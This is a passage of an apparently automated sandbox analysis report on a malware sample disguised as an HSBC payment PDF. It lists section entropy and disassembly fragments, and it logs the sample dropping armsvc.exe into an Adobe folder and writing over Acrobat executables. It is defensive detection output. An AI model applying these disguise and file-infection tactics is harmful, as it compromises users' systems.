              Source: elevation_service.exe0.4.drStatic PE information: section name: .retplne
              Source: elevation_service.exe0.4.drStatic PE information: section name: _RDATA
              Source: elevation_service.exe0.4.drStatic PE information: section name: malloc_h
              Source: maintenanceservice.exe0.4.drStatic PE information: section name: .00cfg
              Source: maintenanceservice.exe0.4.drStatic PE information: section name: .voltbl
              Source: maintenanceservice.exe0.4.drStatic PE information: section name: _RDATA
              Source: msdtc.exe.4.drStatic PE information: section name: .didat
              Source: msiexec.exe.4.drStatic PE information: section name: .didat
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.drStatic PE information: section name: .00cfg
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.drStatic PE information: section name: .retplne
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.drStatic PE information: section name: .00cfg
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.drStatic PE information: section name: .retplne
              Source: MsSense.exe.4.drStatic PE information: section name: .didat
              Source: Spectrum.exe.4.drStatic PE information: section name: .didat
              Source: TieringEngineService.exe.4.drStatic PE information: section name: .didat
              Source: vds.exe.4.drStatic PE information: section name: .didat
              Source: VSSVC.exe.4.drStatic PE information: section name: .didat
              Source: WmiApSrv.exe.4.drStatic PE information: section name: .didat
              Source: wmpnetwk.exe.4.drStatic PE information: section name: .didat
              Source: SearchIndexer.exe.4.drStatic PE information: section name: .didat
              Source: unpack200.exe.4.drStatic PE information: section name: .00cfg
              Source: ie_to_edge_stub.exe.4.drStatic PE information: section name: .00cfg
              Source: ie_to_edge_stub.exe.4.drStatic PE information: section name: .gxfg
              Source: ie_to_edge_stub.exe.4.drStatic PE information: section name: .retplne
              Source: ie_to_edge_stub.exe.4.drStatic PE information: section name: _RDATA
              Source: cookie_exporter.exe.4.drStatic PE information: section name: .00cfg
              Source: cookie_exporter.exe.4.drStatic PE information: section name: .gxfg
              Source: cookie_exporter.exe.4.drStatic PE information: section name: .retplne
              Source: cookie_exporter.exe.4.drStatic PE information: section name: _RDATA
              Source: identity_helper.exe.4.drStatic PE information: section name: .00cfg
              Source: identity_helper.exe.4.drStatic PE information: section name: .gxfg
              Source: identity_helper.exe.4.drStatic PE information: section name: .retplne
              Source: identity_helper.exe.4.drStatic PE information: section name: _RDATA
              Source: identity_helper.exe.4.drStatic PE information: section name: malloc_h
              Source: setup.exe.4.drStatic PE information: section name: .00cfg
              Source: setup.exe.4.drStatic PE information: section name: .gxfg
              Source: setup.exe.4.drStatic PE information: section name: .retplne
              Source: setup.exe.4.drStatic PE information: section name: LZMADEC
              Source: setup.exe.4.drStatic PE information: section name: _RDATA
              Source: setup.exe.4.drStatic PE information: section name: malloc_h
              Source: msedgewebview2.exe.4.drStatic PE information: section name: .00cfg
              Source: msedgewebview2.exe.4.drStatic PE information: section name: .gxfg
              Source: msedgewebview2.exe.4.drStatic PE information: section name: .retplne
              Source: msedgewebview2.exe.4.drStatic PE information: section name: CPADinfo
              Source: msedgewebview2.exe.4.drStatic PE information: section name: LZMADEC
              Source: msedgewebview2.exe.4.drStatic PE information: section name: _RDATA
              Source: msedgewebview2.exe.4.drStatic PE information: section name: malloc_h
              Source: msedge_proxy.exe.4.drStatic PE information: section name: .00cfg
              Source: msedge_proxy.exe.4.drStatic PE information: section name: .gxfg
              Source: msedge_proxy.exe.4.drStatic PE information: section name: .retplne
              Source: msedge_proxy.exe.4.drStatic PE information: section name: _RDATA
              Source: msedge_proxy.exe.4.drStatic PE information: section name: malloc_h
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: section name: .00cfg
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: section name: .gxfg
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: section name: .retplne
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: section name: LZMADEC
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: section name: _RDATA
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: section name: malloc_h
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00428945 push ecx; ret 0_2_00428958
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_00402F12 push es; retf 0_2_00402F13
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F15C38h; ret 0_2_02F15C35
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F15C98h; ret 0_2_02F15C79
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F15D22h; ret 0_2_02F15CB0
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F15F3Eh; ret 0_2_02F15D79
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F15E05h; ret 0_2_02F15DD4
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F15FAEh; ret 0_2_02F15F1A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F15EE7h; ret 0_2_02F15F39
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F15E3Ch; ret 0_2_02F15F48
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F16056h; ret 0_2_02F16014
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F162B2h; ret 0_2_02F1604C
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F161B2h; ret 0_2_02F16055
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F161E9h; ret 0_2_02F16092
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F1616Dh; ret 0_2_02F160B0
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F160FAh; ret 0_2_02F160BF
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F16189h; ret 0_2_02F160D2
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F1621Ch; ret 0_2_02F161D1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F16248h; ret 0_2_02F161E8
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F1606Fh; ret 0_2_02F162AF
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F16374h; ret 0_2_02F16367
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F163BDh; ret 0_2_02F16373
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F16441h; ret 0_2_02F163FA
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F163FFh; ret 0_2_02F1642E
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F16563h; ret 0_2_02F16485
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F1651Ch; ret 0_2_02F1659E
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F165CAh; ret 0_2_02F16695
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F16947h; ret 0_2_02F166A1
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F16A3Bh; ret 0_2_02F166B3
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F16869h; ret 0_2_02F1673A
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeCode function: 0_2_02F162E0 push 02F165D8h; ret 0_2_02F1684D
              Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: section name: .reloc entropy: 7.920472610831056
              Source: AppVClient.exe.0.drStatic PE information: section name: .reloc entropy: 7.92358913029766
              Source: chrome_proxy.exe.4.drStatic PE information: section name: .reloc entropy: 7.92726442586127
              Source: default-browser-agent.exe.4.drStatic PE information: section name: .reloc entropy: 7.929311025309845
              Source: firefox.exe.4.drStatic PE information: section name: .reloc entropy: 7.926471628018936
              Source: minidump-analyzer.exe.4.drStatic PE information: section name: .reloc entropy: 7.922344179985933
              Source: FXSSVC.exe.4.drStatic PE information: section name: .reloc entropy: 7.93006237528671
              Source: elevation_service.exe.4.drStatic PE information: section name: .reloc entropy: 7.931714198787888
              Source: elevation_service.exe0.4.drStatic PE information: section name: .reloc entropy: 7.933946495231756
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.4.drStatic PE information: section name: .reloc entropy: 7.922117608319024
              Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.4.drStatic PE information: section name: .reloc entropy: 7.922118553104344
              Source: SensorDataService.exe.4.drStatic PE information: section name: .reloc entropy: 7.9225210235147
              Source: Spectrum.exe.4.drStatic PE information: section name: .reloc entropy: 7.933283721436733
              Source: AgentService.exe.4.drStatic PE information: section name: .reloc entropy: 7.924362285797312
              Source: vds.exe.4.drStatic PE information: section name: .reloc entropy: 7.928794455099482
              Source: VSSVC.exe.4.drStatic PE information: section name: .reloc entropy: 7.927148447799061
              Source: wbengine.exe.4.drStatic PE information: section name: .reloc entropy: 7.929015421427103
              Source: wmpnetwk.exe.4.drStatic PE information: section name: .reloc entropy: 7.934808283704654
              Source: SearchIndexer.exe.4.drStatic PE information: section name: .reloc entropy: 7.933761232949268
              Source: identity_helper.exe.4.drStatic PE information: section name: .reloc entropy: 7.928228290645618
              Source: setup.exe.4.drStatic PE information: section name: .reloc entropy: 7.932267885972346
              Source: msedgewebview2.exe.4.drStatic PE information: section name: .reloc entropy: 7.923536914141419
              Source: msedge_proxy.exe.4.drStatic PE information: section name: .reloc entropy: 7.92985152599304
              Source: msedge_pwa_launcher.exe.4.drStatic PE information: section name: .reloc entropy: 7.9342430362750855

              Persistence and Installation Behavior

              barindex
              Drops executable to a common third party application directory
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
